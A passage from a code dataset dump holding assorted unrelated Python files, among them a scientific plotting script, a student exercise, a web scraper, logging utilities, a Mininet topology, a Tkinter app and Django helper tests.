#print(get_lowest_e(mu_z[i][j])[0])\n z[i][j] = get_lowest_e_pt(mu_z[i][j])[0]\n if get_lowest_e(mu_z[i][j])[0] not in levels:\n levels.append(get_lowest_e(mu_z[i][j])[0])\n levels1.append(get_lowest_e_pt(mu_z[i][j])[0])\n #if (T >100):\n # exit() \n\n\nmu_z = np.transpose(mu_z)\nz = np.transpose(z)\n#print(z[:][:])\n\ncolor_levels = []\nfor level in levels:\n color_levels.append(colors[level])\n\nprint(color_levels)\nlevels = [l for l in levels1]\nprint(levels)\n\nlevels.append(0)\nprint(levels)\n# levels index\nlevels = np.sort(levels)\nprint(levels)\nchangedvalues =[4,3,2,1,0]\ncolor_levels1=[]\nfor i,a in enumerate(changedvalues):\n color_levels1.append(color_levels[a])\nprint(color_levels1)\nax2.contourf(T_range, p_range, z,levels=levels,colors=color_levels1, alpha=alpha_back, antialiased=True)\nax2.set_yscale('log')\nax2.set_ylim([p_range[0],p_range[-1]])\nax2.set_xlim([T_range[0],T_range[-1]])\nyticks(np.power(10,np.linspace(-24,30,22)),range(-24,30,2))\nxticks(range(100,1201,200),range(100,1201,200))\nax2.set_title('(b) Phase diagram')\nax2.set_ylabel(r'log$_{10}$($\\frac{p}{p_0}$)')\nax2.set_xlabel(r'$T$ (K)')\nax2.text(0.1, 0.60,'Pt$_7$O$_{14}$',color=color_levels1[4],alpha=1.0,fontsize=16, transform=ax2.transAxes)\n#ax2.text(0.2, 0.5,'Pt$_7$O$_{12}$',fontsize=16,color=color_levels1[4],alpha=1.0,transform=ax2.transAxes)\nax2.text(0.4, 0.5,'Pt$_7$O$_{10}$',fontsize=16, color=color_levels1[3],alpha=1.0,transform=ax2.transAxes)\n#ax2.text(0.3, 0.4,'Pt$_7$O$_{8}$',fontsize=16, color=color_levels1[3],alpha=1.0,transform=ax2.transAxes)\nax2.text(0.4, 0.3,'Pt$_7$O$_{6}$',fontsize=16, color=color_levels1[2],alpha=1.0,transform=ax2.transAxes)\nax2.text(0.7, 0.40,'Pt$_7$O$_{4}$',fontsize=16,color=color_levels1[1],alpha=1.0,transform=ax2.transAxes)\nax2.text(0.7, 0.2,'Pt$_7$O$_{2}$',fontsize=16,color=color_levels1[0],alpha=1.0,transform=ax2.transAxes)\n\nsavefig('free_energy_diagram_Pt7Oxides_600K.pdf')\nplt.show()\n","sub_path":"Platinum_clusters_Project/free_energy_phase_diagrams/free_energy_Pt7Oxides_kpts221/free_energy_plot_Pt7_T600K_old.py","file_name":"free_energy_plot_Pt7_T600K_old.py","file_ext":"py","file_size_in_byte":8577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"212397847","text":"from __future__ import print_function\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport random\n\n'''Procedure'''\n#1-3\n'''Part I: for loops, range(), and help()'''\n#4\ndef days():\n ''' Explain the function here\n '''\n for day in 'MTWRFSS': \n print(day + 'day')\n for day in range(5,8):\n print('It is the ' + str(day) + 'th of September')\n \ndef picks():\n a = [] # make an empty list\n # Why all the brackets below? \n # a += [ brackets here to add an iterable onto a list]\n # random.choice( [brackets here to choose from a list])\n\n a += [random.choice([1, 3, 10])]\n for choices in range(5):\n a += [random.choice([1, 3, 10])]\n\n plt.hist(a)\n plt.savefig('1.3.7/picks2')\n#5\ndef dice(n):\n randlist = []\n randcount = 0\n while randcount < n:\n randlist.append(random.randint(1,6))\n print (randlist)\n randcount = randcount + 1\n plt.hist(randlist, bins = [1,2,3,4,5,6])\n plt.savefig(\"1.3.7/new_piks.png\")\n return (sum(randlist))\n\ndef roll_hundred_pair():\n dice_roll_list = dice(100)\n return dice_roll_list\n\n'''Part II: While loops'''\n#7 line 2 is nessecary because if you set the guess to a value when u re run \n# this code it will use the same value used as last time\ndef validate():\n guess = '1' # initialization with a bad guess so loop starts\n answer = 'hangman word'\n while guess not in answer:\n guess = raw_input('Name a letter in \\''+answer+'\\': ')\n print('Thank you!')\n#8\ndef guess_winner(players=('Amy', 'Bill', 'Cathy', 'Dale')):\n '''Summarize the function in this docstring.\n \n Provide descriptions for the arguments and say what type each one is.\n Describe the type and meaning of the value returned.\n '''\n winner = random.choice(players) \n # prints wheather choosen person won lottery\n print('Guess which of these people won the lottery: ',end='')\n for p in players[:len(players)-1]: # keeps running until the legenth of the \n #index is gone through\n print(p+', ', end='')\n print(players[len(players)-1]) # prints how many players are still in?\n #check if person won or not\n guesses = 1 \n while raw_input() != winner:\n print('Guess again!')\n guesses += 1\n print('You guessed in', guesses, 'guesses!')\n return guesses\n#9\ndef goguess():\n '''try to guess the raanadon number given gigiven hints in the least amount of\nguesses'''\n randnumbergoguess = random.randint(0,20)\n goguessguess = 21\n guessescount = 0\n while int(goguessguess) != int(randnumbergoguess):\n goguessguess = raw_input()\n guessescount = guessescount + 1\n if int(goguessguess) < int(randnumbergoguess):\n print ('', goguessguess ,' is too low')\n elif int(goguessguess) > int(randnumbergoguess):\n print ('', goguessguess ,' is too high')\n return print('You guessed in', guessescount, 'guesses!')\n#10 you need 12 trys becauseif you choose in the middle every time then you \n# will know to go up or down and that will allow you to narrow in on your\n# target quicker\n'''Part III: Practice'''\n#11a\ndef matches(ticket, winners):\n '''find out how many of your lottery ticket numbers are correct'''\n numberscorrect = 0\n if winners.count(ticket[0]) >0:\n numberscorrect = numberscorrect + 1\n if winners.count(ticket[1]) >0:\n numberscorrect = numberscorrect + 1\n if winners.count(ticket[2]) >0:\n numberscorrect = numberscorrect + 1\n if winners.count(ticket[3]) >0:\n numberscorrect = numberscorrect + 1\n if winners.count(ticket[4]) >0:\n numberscorrect = numberscorrect + 1\n print (numberscorrect)\n return numberscorrect\n#11b\ndef report(guess, secret):\n '''find out how many of your mastermind guesses are right'''\n numberscorrectinplace = 0\n checkstep = 0\n while len(guess) > checkstep:\n if guess[checkstep] == secret[checkstep]:\n numberscorrectinplace = numberscorrectinplace + 1\n checkstep = checkstep + 1\n checkstep = 0\n numberscorrecteverywhere = 0\n while len(guess) > checkstep:\n if guess[checkstep] in secret:\n numberscorrecteverywhere = numberscorrecteverywhere +1\n checkstep = checkstep + 1\n print(numberscorrectinplace, numberscorrecteverywhere)\n \n'''Conclusion'''\n#1 it is harder to interpret and takes up more bytes. It can also get stuck\n# in loop easier\n#2 in itiration you go everything step by step one at a time.\n#3 they are very similar and can always be used interchangeably but for loop\n# is better at things that need itteration\n#4 We didnt really work together all that much because I finished this by\n# myself as it says it is due tonight monday so I didnt get the time to work\n# on this with my partner.\n\n'''Assignment Check'''\n#1.3.7 Function Test\nroll_hundred_pair()\ngoguess()\ngoguess()\nprint('next 4 lines should be 2,3,2,3')\nmatches([11, 12, 13, 14, 15], [3, 8, 12, 13, 17])\nmatches([11, 12, 13, 14, 15], [11, 8, 12, 15, 17])\nreport(['red','red','red','green','yellow'], ['red','red','yellow','yellow','black'])\nreport(['red','blue','red','green','yellow'], ['red','blue','yellow','yellow','yellow'])\n# based on this I get the correct reasults leading me to belive that my\n# method is correct","sub_path":"1.3.7/Shah_1.3.7.py","file_name":"Shah_1.3.7.py","file_ext":"py","file_size_in_byte":5345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"168685654","text":"from PIL import Image\r\n\r\ndef main():\r\n og_img = Image.open('lisa.jpg')#specify image to use\r\n border = 50 #amount of small pictures that make up a side of the completed picture\r\n fin_img = process(og_img, border)\r\n \r\n if input(\"Do you want to save completed picture?(y/n): \")[0].lower() == \"y\":\r\n name, ext = og_img.filename.split(\".\")\r\n fin_img.save(name+\"_edited.\"+ext)\r\n print(\"Image saved\")\r\n else:\r\n fin_img.show()\r\n\r\n#makes a smaller version of the image and returns it\r\ndef smolify(image):\r\n og_width = image.width\r\n og_height = image.height\r\n\r\n if og_width > og_height:\r\n new_width = 50\r\n new_height = int(new_width/og_width * og_height) \r\n else:\r\n new_height = 50\r\n new_width = int(new_height/og_height * og_width)\r\n \r\n size = new_width,new_height\r\n \r\n return image.resize(size)\r\n\r\n#Averages each pixel of the image with the passed in RGB color\r\ndef tint(im, r, g, b):\r\n source = im.split()\r\n R, G, B = 0, 1, 2\r\n outR = source[R].point(lambda i: (i+r)/2)\r\n outG = source[G].point(lambda i: (i+g)/2)\r\n outB = source[B].point(lambda i: (i+b)/2)\r\n # build a new multiband image\r\n im = Image.merge(\"RGB\", (outR,outG,outB))\r\n return im\r\n\r\n#does the image processing\r\n#og_path is the path of the image to be processed\r\n#border variable determines the amount of small pictures that make up one side of the completed picture\r\n#if mode is set to s than the finished image will automatically be saved\r\ndef process(og_img, border = 100, mode = None):\r\n og_width = og_img.width\r\n og_height = og_img.height\r\n smol_img = smolify(og_img)\r\n smol_width = smol_img.width\r\n smol_height = smol_img.height\r\n fin_img = Image.new(\"RGB\", (smol_width*border,smol_height*border))\r\n\r\n #do image processesing \r\n for x in range(0, border):\r\n for y in range(0, border):\r\n print(\"Working...\")\r\n pix_coord = (int(og_width/border*x), int(og_height/border*y))\r\n pix = og_img.getpixel(pix_coord)\r\n r, g, b = pix\r\n tint_img = tint(smol_img, r, g, b)\r\n coord = (smol_width*x, smol_height*y)\r\n fin_img.paste(tint_img, coord)\r\n \r\n if mode == 's':\r\n name, ext = og_img.filename.split(\".\")\r\n fin_img.save(name+\"_edited.\"+ext)\r\n print(\"Image saved\")\r\n\r\n return fin_img\r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"speedwagon_project/image_processor.py","file_name":"image_processor.py","file_ext":"py","file_size_in_byte":2443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"170615031","text":"import time\n\nimport requests\nfrom lxml import etree\nfrom concurrent.futures import ThreadPoolExecutor\n\n\ndef main():\n start = time.time()\n with ThreadPoolExecutor(20) as t:\n for i in range(1, 29):\n url = f\"https://learnku.com/laravel?page={i}\"\n t.submit(save_info, url=url, page=i)\n end = time.time()\n\n print(f\"down---{end - start}\")\n # html = get_html()\n # # print(html)\n # get_content(html)\n\n\ndef save_info(url, page):\n get_content(get_html(url))\n # print(f\"第{page}页,爬取完毕\")\n\n\ndef get_html(url):\n headers = {\n \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) \"\n \"Chrome/90.0.4430.212 Safari/537.36 \"\n }\n r = requests.get(url, headers=headers)\n if r.status_code == 200:\n return r.text\n else:\n print(f'状态码错误{r.status_code}')\n\n\ndef get_content(html):\n tree = etree.HTML(html)\n # total_page = tree.xpath('//ul[@class=\"pagination\"]/li[last()-1]/a/text()')[0]\n # if not total_page:\n # print(\"未获取到页码信息\")\n # exit()\n # spans = tree.xpath('//span[@class=\"topic-title\"]')\n divs = tree.xpath('//div[@class=\"py-2 simple-topic\"]')\n\n for i in divs:\n title = i.xpath('./a/span[@class=\"topic-title\"]/text()')[0].strip()\n link = i.xpath('./a/@href')[0]\n if title:\n print(title)\n print(link)\n print(\"=\" * 20)\n\n\n# with open('./files/laravel_info3.txt', 'a+', encoding='utf-8') as f:\n# for i in spans:\n# title = i.xpath('./text()')[0].strip()\n# if title:\n# f.write(title + '\\n')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/laravel中文社区.py","file_name":"laravel中文社区.py","file_ext":"py","file_size_in_byte":1714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"495656254","text":"# -*- coding: utf-8 -*-\n# @Time : 2017/6/27 14:29\n# @Author : simba\n\"\"\"\naop 工具模块\n\"\"\"\nimport datetime\nimport functools\nimport logging\nimport os\nimport sys\n\n_logger = logging.getLogger('simba.utils.aop_utils')\nlogging.basicConfig(\n level=logging.INFO,\n format='%(asctime)s %(name)-10s %(levelname)-5s %(message)s',\n datefmt='%y-%m-%d %H:%M:%S',\n # handlers=[RotatingFileHandler('aop.log', maxBytes=1024 * 1024 * 30, backupCount=50)]\n)\n\nseparater = os.sep\n\n\ndef log_before(func):\n @functools.wraps(func)\n def wrapper(*args, **kw):\n file_name = sys._getframe().f_back.f_code.co_filename.split(separater)[-1]\n code_line = sys._getframe().f_back.f_lineno\n _logger.info(' %s(%s) begin execute %s with %s %s' % (\n file_name, code_line, func.__name__, args,\n kw))\n return func(*args, **kw)\n\n return wrapper\n\n\ndef log_after(func):\n @functools.wraps(func)\n def wrapper(*args, **kw):\n file_name = sys._getframe().f_back.f_code.co_filename.split(separater)[-1]\n code_line = sys._getframe().f_back.f_lineno\n result = func(*args, **kw)\n _logger.info(' %s(%s) successfully execute %s with %s %s, return %s' % (\n file_name, code_line, func.__name__, args, kw, result))\n return result\n\n return wrapper\n\n\ndef log_around(func):\n @functools.wraps(func)\n def wrapper(*args, **kw):\n file_name = sys._getframe().f_back.f_code.co_filename.split(separater)[-1]\n code_line = sys._getframe().f_back.f_lineno\n start_time = datetime.datetime.now()\n _logger.info(' %s(%s) begin execute %s at %s with %s %s' % (\n file_name, code_line, func.__name__, start_time, args, kw))\n\n result = func(*args, **kw)\n end_time = datetime.datetime.now()\n _logger.info(\n ' %s(%s) successfully execute %s at %s, return %s. use time: %s ' % (\n file_name, code_line, func.__name__, end_time, result, end_time - start_time))\n return result\n\n return wrapper\n\n\nif __name__ == '__main__':\n @log_around\n def add():\n sum = 0\n for i in range(10000000):\n sum += i\n return sum\n\n\n print(add())\n","sub_path":"simba/utils/aop_utils.py","file_name":"aop_utils.py","file_ext":"py","file_size_in_byte":2228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"523244501","text":"\"\"\"Storage module with settings for argparse and logging\"\"\"\n\nimport logging\nimport sys\nfrom enum import Enum\nfrom pathlib import Path\n\nimport argparse\n\n\nclass AppConstant(Enum):\n \"\"\"Class immutable values\"\"\"\n ACTUAL_VERSION = 'Version 4.1.0'\n\n\nclass AppArgParser:\n \"\"\"Class for initializing arguments for working with CLI\"\"\"\n\n def __init__(self):\n self.parser = argparse.ArgumentParser(description='Pure Python command-line RSS reader.')\n self.parser.add_argument('--version', action=\"version\", version=AppConstant.ACTUAL_VERSION.value,\n help='Print version info')\n self.parser.add_argument('--json', action='store_true', help='Print result as JSON in stdout')\n self.parser.add_argument('--verbose', action=\"store_true\", help='Outputs verbose status messages')\n self.parser.add_argument('--limit', type=int, default=None, help='Limit news topics if this parameter provided')\n self.parser.add_argument('source', nargs=\"?\", default=None, help='URL RSS')\n self.parser.add_argument('--date', type=int, default=None,\n help='Print news published on a specific date from cache')\n self.parser.add_argument('--to-html', type=str, nargs=\"?\", metavar=\"PATH\",\n help=\"Convert news to HTML format and save them by the specified folder path\")\n self.parser.add_argument('--to-pdf', type=str, nargs=\"?\", metavar=\"PATH\",\n help=\"Convert news to PDF format and save them by the specified folder path\")\n\n def get_args(self) -> argparse.Namespace:\n \"\"\"\n Initialization of arguments\n :return: object storing attributes\n \"\"\"\n return self.parser.parse_args()\n\n\nclass AppLogger:\n \"\"\"Class for initialization and setup logger and handlers\"\"\"\n\n FORMAT = '%(asctime)s - %(name)s:%(lineno)s - %(levelname)s - %(message)s'\n\n @staticmethod\n def init_logger(name):\n \"\"\"Initialization and setup root logger. Setup and start file handler\"\"\"\n logger = logging.getLogger(name)\n logger.setLevel(logging.DEBUG)\n\n current_dir = Path(__file__).parent.resolve()\n file_path = Path(current_dir, 'logs/grebarss_logs.log')\n\n fh = logging.FileHandler(filename=file_path, mode='w', encoding='utf-8')\n fh.setFormatter(logging.Formatter(AppLogger.FORMAT))\n fh.setLevel(logging.DEBUG)\n logger.addHandler(fh)\n\n @staticmethod\n def activate_verbose():\n \"\"\"Setup and start stream handler for verbose mode\"\"\"\n logger = logging.getLogger('app')\n sh = logging.StreamHandler(stream=sys.stdout)\n sh.setFormatter(logging.Formatter(AppLogger.FORMAT))\n sh.setLevel(logging.INFO)\n logger.addHandler(sh)\n","sub_path":"AlexanderHreben/grebarss_reader/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"138475728","text":"from dataclasses import dataclass\n\n\n@dataclass(frozen=True)\nclass SongCodec:\n \"\"\"\n Represents a sound codec\n \"\"\"\n mime_type: str\n extension: str\n\n\nMP4 = SongCodec(\"video/mp4\", 'mp4')\nMP4_AUDIO = SongCodec(\"audio/mp4\", 'm4a')\n\nCODECS = [MP4, MP4_AUDIO]\n","sub_path":"core/song_codecs.py","file_name":"song_codecs.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"144773008","text":"#coding=utf-8\n__author__ = 'AllenCHM'\nimport sys\n\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\nimport os\n\ndef download_package(package_url):\n print(\"start download_build_result\")\n if not package_url.endswith(\"/\"):\n package_url += '/'\n cmd = \"wget -c -r -nd -np -P %s %s\" % (\"output\", package_url)\n print(cmd)\n os.system(cmd)\n print(os.getcwd())\n print(\"finish download_build_result\")","sub_path":"网络/Python根据url下载目录或者文件.py","file_name":"Python根据url下载目录或者文件.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"344822716","text":"# binary search, time O(log(n)), space O(1)\nclass Solution(object):\n def nextGreatestLetter(self, letters, target):\n \"\"\"\n :type letters: List[str]\n :type target: str\n :rtype: str\n \"\"\"\n if not letters or not ('a' <= target <= 'z') \\\n or (letters[0] == letters[-1] == target):\n return \"\"\n if letters[-1] <= target:\n return letters[0]\n \n left, right = 0, len(letters)-1\n while left + 1 < right:\n mid = left + (right-left)//2\n if letters[mid] > target:\n right = mid\n else:\n left = mid\n if letters[left] > target:\n return letters[left]\n elif letters[right] > target:\n return letters[right]\n else:\n return letters[0]\n \n\n\n\n# time O(n), space O(1)\nclass Solution1(object):\n def nextGreatestLetter(self, letters, target):\n \"\"\"\n :type letters: List[str]\n :type target: str\n :rtype: str\n \"\"\"\n if not letters or not ('a' <= target <= 'z'):\n return \"\"\n res = float('inf')\n for c in letters:\n num = (26 + ord(c) - ord(target))%26 # shift all letters so that target is set to 0\n if num > 0:\n res = min(res, num)\n code = res + ord(target)\n if code > ord('z'):\n code -= 26\n return chr(code)\n\n\n\"\"\"\nGiven a list of sorted characters letters containing only lowercase letters, and given a target letter target, find the smallest element in the list that is larger than the given target.\n\nLetters also wrap around. For example, if the target is target = 'z' and letters = ['a', 'b'], the answer is 'a'.\n\nExamples:\nInput:\nletters = [\"c\", \"f\", \"j\"]\ntarget = \"a\"\nOutput: \"c\"\n\nInput:\nletters = [\"c\", \"f\", \"j\"]\ntarget = \"c\"\nOutput: \"f\"\n\nInput:\nletters = [\"c\", \"f\", \"j\"]\ntarget = \"d\"\nOutput: \"f\"\n\nInput:\nletters = [\"c\", \"f\", \"j\"]\ntarget = \"g\"\nOutput: \"j\"\n\nInput:\nletters = [\"c\", \"f\", \"j\"]\ntarget = \"j\"\nOutput: \"c\"\n\nInput:\nletters = [\"c\", \"f\", \"j\"]\ntarget = \"k\"\nOutput: \"c\"\nNote:\nletters has a length in range [2, 10000].\nletters consists of lowercase letters, and contains at least 2 unique letters.\ntarget is a lowercase letter.\n\"\"\"\n","sub_path":"0744. Find Smallest Letter Greater Than Target.py","file_name":"0744. Find Smallest Letter Greater Than Target.py","file_ext":"py","file_size_in_byte":2275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"97860248","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\n\nimport fsquery\nimport mvtools_exception\nimport terminal_colors\n\nimport git_push\nimport git_lib\nimport path_utils\n\ndef filter_sub_files(sub_candidates):\n\n ret = []\n for i in sub_candidates:\n if path_utils.basename_filtered(i) == \".git\":\n ret.append(path_utils.dirname_filtered(i))\n\n return ret\n\ndef push_subs(path):\n\n v, r = fsquery.makecontentlist(path, True, False, False, False, True, False, True, None)\n if not v:\n raise mvtools_exception.mvtools_exception(r)\n subs = filter_sub_files(r)\n\n report = []\n anyfailed = False\n\n for s in subs:\n\n v, r = git_lib.get_remotes(s)\n if not v:\n anyfailed = True\n report.append(\"push_subs failed [%s]: [%s]\" % (s, r))\n continue\n rs = r\n v, r = git_lib.get_branches(s)\n if not v:\n anyfailed = True\n report.append(\"push_subs failed [%s]: [%s]\" % (s, r))\n continue\n bs = r\n\n af, r = git_push.do_push(s, rs, bs)\n anyfailed |= af\n report += r\n\n print(os.linesep)\n for rp in report:\n print(rp)\n print(os.linesep)\n\n if anyfailed:\n print(\"%sErrors detected, see above.%s\" % (terminal_colors.TTY_RED, terminal_colors.TTY_WHITE))\n else:\n print(\"%sAll succeeded.%s\" % (terminal_colors.TTY_GREEN, terminal_colors.TTY_WHITE))\n\nif __name__ == \"__main__\":\n\n path = \"\"\n if len(sys.argv) > 1:\n path = sys.argv[1]\n else:\n path = os.getcwd()\n\n push_subs(path)\n","sub_path":"git/visitor/git_sub_push.py","file_name":"git_sub_push.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"51335561","text":"#!/usr/bin/python\n\nfrom mininet.topo import Topo\n# from mininet.link import TCLink\n\nclass MyTopo(Topo):\n\tdef __init__(self):\n\n\t\tTopo.__init__(self)\n\n\t\thost1 = self.addHost('h1', mac='00:00:00:00:00:01', ip='10.0.0.1')\n\t\thost2 = self.addHost('h2', mac='00:00:00:00:00:02', ip='10.0.0.2')\n\n\t\tswitch1 = self.addSwitch('s1')\n\t\tswitch2 = self.addSwitch('s2')\n\n\t\tself.addLink(switch2, host2)\n\t\tself.addLink(switch1, host1)\n\t\tself.addLink(switch1, switch2)\n\ntopos = {'mytopo': (lambda: MyTopo() )}\n","sub_path":"mininet-scripts/tipo-experimental.py","file_name":"tipo-experimental.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"330173688","text":"from tkinter import *\nimport webbrowser\nwindow=Tk()\nwindow.geometry(\"300x200\")\nwindow.title(\"COLT BKMT\")\n\nnew = 1\nurl = \"https://coltnyc.tumblr.com/\"\n\nnew = 2\nurl2 = \"https://www.youtube.com/watch?v=aUYt0UYYFJQ\"\n\nmyname = \"Colt Montana\"\nmymail = \"cwmcphail90@gmail.com\"\n\n\n\ndef full_name():\n print(myname)\n print(mymail)\n\n\ndef openweb():\n webbrowser.open(url,new=new)\n\ndef openweb2():\n webbrowser.open(url2,new=new)\n\ndef myClick():\n myLabel = Label(window, text=\"Colt Montana \\n cwmcphail@gmail.com\")\n myLabel.pack()\n\n \nlabel1 = Label(window, text=\"The Official App of Colt Montana\", fg=\"black\", bg=\"red\", relief=\"solid\", font= (\"arial\", 18, \"bold\")).pack()\n\nBtn = Button(text = \"Music\", padx=10, pady=5, command=openweb)\nBtn.pack()\n\nbutton3 = Button(text=\"Country Boy Mile High Video\", padx=10, pady=5, command=openweb2)\nbutton3.pack()\n\n\nmyButton = Button(window, text=\"Info\", padx=10, pady=5, command=myClick)\nmyButton.pack()\n\nquit_button = Button(window, text=\"Quit\", padx=10, pady=5, command=quit)\nquit_button.pack()\n\nwindow.mainloop()","sub_path":"colt_app.py","file_name":"colt_app.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"205909207","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.1 (3151)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-i686/egg/dust/services/dustmail/reader.py\n# Compiled at: 2010-06-01 14:15:46\nimport os, sys, time, glob\nfrom dust.crypto.curve import Key\nfrom dust.crypto.keys import KeyManager\nfrom dust.core.util import getPublicIP, encode, decode\nfrom dust.core.data_packet import DataPacket\nfrom dust.util.ymap import YamlMap\npasswd = sys.argv[1]\nkeys = KeyManager()\nkeys.setInvitePassword(passwd)\nkeys.loadKnownHosts('config/knownhosts.yaml')\nkeys.loadKeypair('config/id.yaml')\nkeys.loadIncomingInvites('config/incoming_invites.ip')\nkeys.loadOutgoingInvites('config/outgoing_invites.ip')\nkeypair = keys.getKeypair()\npubkey = keypair.public\npubkeyhex = encode(pubkey.bytes)\nprint('pubkey: ' + pubkeyhex)\nmaildir = 'spool/' + pubkeyhex\naddressBook = YamlMap('config/dustmail-addressbook.yaml')\n\ndef displayList():\n msgs = []\n for file in glob.glob(maildir + '/*.*'):\n stats = os.stat(file)\n lastmod_date = time.localtime(stats[8])\n date_file_tuple = (lastmod_date, file)\n msgs.append(date_file_tuple)\n\n msgs.sort()\n msgs.reverse()\n for x in range(len(msgs)):\n date, fname = msgs[x]\n frm = fname.split('/')[(-1)].split('-')[0]\n modtime = time.strftime('%m/%d/%Y %I:%M%p', date)\n try:\n frm = addressBook[frm]\n except:\n pass\n\n print(str(x + 1) + ': ' + frm + ' ' + modtime)\n\n return msgs\n\n\ndef displayMessage(fname):\n f = open(fname, 'r')\n msg = f.read()\n f.close()\n destpubkey = Key(decode(fname.split('/')[(-1)].split('-')[0]), False)\n sessionKey = keypair.createSession(destpubkey)\n data = decode(msg)\n packet = DataPacket()\n packet.decodeDataPacket(sessionKey.bytes, data)\n print(packet.data.decode('ascii'))\n\n\ndef parseCommand(command):\n if command == 'x':\n sys.exit(0)\n\n\nmsgs = displayList()\ncommand = None\nwhile input != 'x':\n command = input('> ').strip()\n try:\n num = int(command)\n except:\n if command == 'l':\n msgs = displayList()\n else:\n parseCommand(command)\n\n displayMessage(msgs[(num - 1)][1])","sub_path":"pycfiles/Dust-0.1a7-py3.1/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"392609386","text":"from datetime import datetime\nfrom functools import wraps\n\nfrom memorious.core import session\nfrom memorious.model.event import Event\nfrom memorious.model.operation import Operation\n\n\ndef operation():\n \"\"\"Wrap a method on a crawler to track the outcome of its execution.\"\"\"\n def op_decorator(func):\n\n @wraps(func)\n def func_wrapper(context, data, *a, **kw):\n op = Operation()\n op.crawler = context.crawler.name\n op.name = context.stage.name\n op.run_id = context.run_id\n op.status = Operation.STATUS_PENDING\n session.add(op)\n session.commit()\n\n context.operation_id = op.id\n\n try:\n context.log.info('Running: %s', op.name)\n res = func(context, data, *a, **kw)\n op.status = Operation.STATUS_SUCCESS\n return res\n except Exception as exc:\n # this should clear results and tags created by this op\n session.rollback()\n Event.save(op.id, Event.LEVEL_ERROR, exc=exc)\n context.log.exception(exc)\n finally:\n if op.status == Operation.STATUS_PENDING:\n op.status = Operation.STATUS_FAILED\n op.ended_at = datetime.utcnow()\n session.add(op)\n session.commit()\n\n return func_wrapper\n return op_decorator\n","sub_path":"memorious/logic/operation.py","file_name":"operation.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"456010796","text":"from flask import Flask, render_template, request, session, g, redirect, url_for, abort, flash\nimport gspread\nfrom oauth2client.service_account import ServiceAccountCredentials\n\n# Set up for flask\nDEBUG = True\n\napp = Flask(__name__)\napp.config.from_object(__name__)\n\n# set up for gspread\nscope = ['https://spreadsheets.google.com/feeds']\ncredentials = ServiceAccountCredentials.from_json_keyfile_name('creds.json', scope)\ngc = gspread.authorize(credentials)\n\n@app.route('/')\ndef hello_world():\n sh = gc.open(\"Charged Question Responses\")\n worksheet = sh.get_worksheet(0)\n responses = worksheet.get_all_values()\n responses = responses[1:]\n responses = [dict(time=row[0], text=row[1], name=row[2]) for row in responses]\n responses = responses[::-1]\n return render_template('show_responses.html', responses=responses)\n\n@app.route('/form')\ndef show_form():\n return render_template('form.html')\n\nif __name__ == '__main__':\n app.run()","sub_path":"hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"130259403","text":"import pytest\nfrom django.http import QueryDict\n\nfrom django.urls import reverse\n\nfrom core import helpers\nfrom core.helpers import SortFilter, sort_opportunities, ScaleFilter, \\\n filter_opportunities, RegionFilter, SectorFilter, SubSectorFilter\n\n\n@pytest.mark.parametrize('path,expect_code', (\n ('/', None),\n ('?language=pt', 'pt'),\n ('/industries?language=es', 'es'),\n ('/industries/?language=zh-hans', 'zh-hans'),\n ('/industries/aerospace?language=de', 'de'),\n ('/industries/automotive/?language=fr', 'fr'),\n ('?lang=fr', 'fr'),\n ('?language=de&lang=de', 'de'),\n ('?lang=pt&language=es', 'es')\n))\ndef test_get_language_from_querystring(path, expect_code, rf):\n url = reverse('index')\n request = rf.get(url + path)\n language_code = helpers.get_language_from_querystring(request)\n assert language_code == expect_code\n\n\nunslugify_slugs = [\n ('test-slug-one', 'Test slug one'),\n ('test-two', 'Test two'),\n ('slug', 'Slug'),\n]\n\n\n@pytest.mark.parametrize('slug,exp', unslugify_slugs)\ndef test_unslugify(slug, exp):\n assert helpers.unslugify(slug) == exp\n\n\ndef test_get_paginator_url():\n filters = QueryDict('')\n\n assert helpers.get_paginator_url(filters, 'opportunities') == (\n reverse('opportunities') + '?'\n )\n\n\ndef test_get_paginator_url_with_filters():\n filters = QueryDict('sector=Energy§or=Aerospace&scale=Value+unknown')\n\n assert helpers.get_paginator_url(filters, 'opportunities') == (\n reverse('opportunities') + '?sector=Energy§or=Aerospace&scale=Value+unknown' # 